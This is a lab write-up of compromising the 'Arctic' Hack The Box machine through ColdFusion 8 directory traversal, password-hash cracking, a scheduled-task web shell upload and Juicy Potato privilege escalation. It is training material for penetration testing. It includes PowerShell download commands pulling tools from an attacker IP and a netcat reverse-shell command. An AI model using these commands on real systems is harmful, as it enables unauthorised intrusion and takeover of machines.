# ARCTIC | 10.10.10.11

## Initial Enumeration - nmap

> nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.11

### Open Ports and Running Services

* 135 - MSRPC
* 8500 - fmtp?
* 49154 - MSRPC

### OS Discovery

nmap's best guess is Windows 8.1 Update 1, so we'll go with that

## Service Enumeration

### MSRPC (135/49154)

Trying to connect to either port with rpcclient results in a timeout, so this appears to be a dead end for now.

### FMTP? (8500)

Researching this port brings up something about a "Flight Message Transfer Protocol", which is honestly over my head, so instead I just navigate to the port in a web browser, and something pops up:

![port-8500](img/port-8500.png)

After some more research, it turns out that this port is running an instance of Adobe ColdFusion 8. Naturally, I navigate to the _administrator_ directory.  

![cfide](img/cfide.png)

I also notice that this box is very very slow, it just seems to hang for a while before moving on. I am presented with a login screen, but with the lag if I have to brute force my way in that would be very discouraging.  
So I look for other options.

![login](img/login-screen.png)

A cursory searchsploit query indicates several potential vulnerabilities:

![vulns](img/searchsploit.png)

Since I am trying to avoid using Metasploit for these boxes, I will look at avenues that use other means. One that stands out is a directory traversal vuln that can grab the administrator hash.  
Another that might be useful is an unrestricted file upload vulnerability that could allow me to gain a shell.

## Initial Exploitation

### Directory Traversal

![dir-trav](img/dirtrav.png)

So for this exploit to run, I just need to supply some arguments to it. Here goes!

![pass](img/password.png)

Nice! Now I have an encrypted password that I will have to crack somehow. A good first step is to always check online hash crackers; maybe it is already online. Lo and behold, I have a plaintext password:

![cracked-pass](img/cracked.png)

### Getting a shell

So with this info, I will log into the slow AF admin panel and check it out.

Navigating in this panel is a pain, since everything takes so long to load, but I have the ability to upload files as a scheduled task, which could be leveraged to get a shell.

![panel](img/panel.png)

I don't know anything at all about ColdFusion, but after doing some googling, there does seem to exist a cfm shell I can upload and execute.

![serving-file](img/grab-shell.png)

![complete](img/task.png)

Navigating to /CFIDE/cfexec.cfm, I find the webshell waiting for me:

![webshell](img/webshell.png)

Messing around with it yields nothing at all, however, so I am forced to look for other options.  
After searching for another reverse shell, I stumbled upon [this](https://github.com/Impenetrable/ReverseFusion/blob/master/ReverseFusion.py) handy little cfm reverse shell generator.  
I plugged in the relevant info, it generated a cfm file, and I uploaded it using the same scheduled task method above, then navigated to the correct location to trigger the exploit:

![powershell](img/pshell.png)

## Privilege Escalation

### Enumeration

First, let's grab the user flag like we do:

![flag](img/user-flag.png)

A quick check of systeminfo reveals we are working with an x64 Windows Server 2008 R2 Standard, with apparently no hotfixes installed.  
Additionally, my user has the **SeImpersonatePrivilege**, which could mean I have a quick way to root.

![whoami](img/whoami.png)

However, in the interests of being thorough and to get better at things, I am going to upload and run **PowerUp.ps1** to see what other avenues I have.

I need to type in the right command to download the file in powershell, which I am terrible at and very much still learning (note my IP address changed because the VPN connection died):

> (New-Object Net.WebClient).DownloadFile("http://10.10.14.23:80/PowerUp.ps1","C:\users\tolis\pup.ps1")

Then I type "Invoke-AllChecks" and the enumeration script starts working, but I quickly learned that the main vuln in this case turns out to be the SeImpersonatePrivilege:

![invoke-allchecks](img/invoke.png)

So, that is the next step.

### Exploitation

I need to upload the Juicy Potato Exploit (search google for 'SeImpersonate exploit' and you'll learn about it) and run it to gain administrator privileges. There is a way to do this in Metasploit, but I am trying to do it the harder way to prepare for the OSCP, so here goes.

First, I will upload the exe, hoping it doesn't get blocked by AV:

> (New-Object Net.WebClient).DownloadFile("http://10.10.14.23:80/JuicyPotato.exe","C:\users\tolis\spud.exe")

Then, I also have to upload a way to connect back - this time I will upload netcat because it's easier than trying another powershell script:

> (New-Object Net.WebClient).DownloadFile("http://10.10.14.23:80/nc.exe","C:\users\tolis\nc.exe")

Now, to pull off this exploit, I need to type the correct arguments:

> ./spud.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\tolis\nc.exe -e cmd.exe 10.10.14.23 9999" -t *

![tater](img/tater.png)

After a few seconds, I am now root and have compromised this machine:

![root](img/root.png)

All that is left is to grab the flag and we're done.

![flag](img/root-flag.png)

## Conclusion

If this box were not so damn slow at the start, it would be more fun. I found out that ColdFusion is delaying all commands sent to it by something like 24 seconds, as a security measure.  
Well, we could see that it didn't work ;)  

So, to recap, I was able to own this box by:

* Exploiting a directory traversal vulnerability to grab the Adobe ColdFusion Admin hash
* Cracking the hash with an online service and logging in
* Then I abused the Scheduled Task Upload function to upload a reverse shell to gain low priv access
* Finally I was able to escalate to root by using the JuicyPotato attack, which allows a user to leverage the SeImpersonate priv to become root.
* Overall this was a fun box, despite the slowness. 8/10 would do again.

![TATERS](img/tumblr_lrcbdyFYgs1qgzqnco1_500.gif)
